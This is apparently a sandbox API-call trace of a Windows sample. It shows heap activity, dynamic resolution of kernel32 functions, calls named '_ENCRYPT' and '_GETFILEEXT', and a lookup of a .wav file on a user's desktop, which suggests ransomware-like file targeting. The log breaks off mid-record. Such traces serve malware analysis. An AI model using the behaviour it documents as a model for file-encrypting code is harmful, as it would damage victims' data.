[0158.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0158.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0158.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0158.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.439] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0158.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0158.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0158.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0158.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0158.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.440] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0158.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0158.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0158.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0158.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0158.441] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0158.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0158.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0158.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0158.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0158.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0158.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0158.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0158.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0158.442] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0158.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0158.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0158.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0158.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0158.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0158.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0158.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0158.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0158.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0158.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0158.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0158.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.443] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0158.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0158.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0158.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0158.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba420, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0158.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0158.444] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0158.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0158.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0158.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0158.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0158.444] CloseHandle (hObject=0x120) returned 1 [0158.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0158.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0158.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0158.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0158.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0158.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0158.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0158.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0158.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0158.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0158.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0158.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0158.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0158.444] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0158.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0158.445] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0158.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0158.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0158.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0158.445] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0158.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0158.445] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.446] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0158.446] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.446] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0158.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.446] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0158.446] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0158.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0158.447] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0158.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0158.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0158.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0158.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0158.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0158.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0158.447] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7b58cd0, ftCreationTime.dwHighDateTime=0x1d5e423, ftLastAccessTime.dwLowDateTime=0x64768a0, ftLastAccessTime.dwHighDateTime=0x1d5e3d5, ftLastWriteTime.dwLowDateTime=0x64768a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d5, nFileSizeHigh=0x0, nFileSizeLow=0x81f0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="CosD3IMWD.wav", cAlternateFileName="COSD3I~1.WAV")) returned 0x90add8 [0158.448] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.448] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0158.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0158.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0158.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0158.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0158.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0158.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0158.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0158.448] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7b58cd0, ftCreationTime.dwHighDateTime=0x1d5e423, ftLastAccessTime.dwLowDateTime=0x64768a0, ftLastAccessTime.dwHighDateTime=0x1d5e3d5, ftLastWriteTime.dwLowDateTime=0x64768a0, 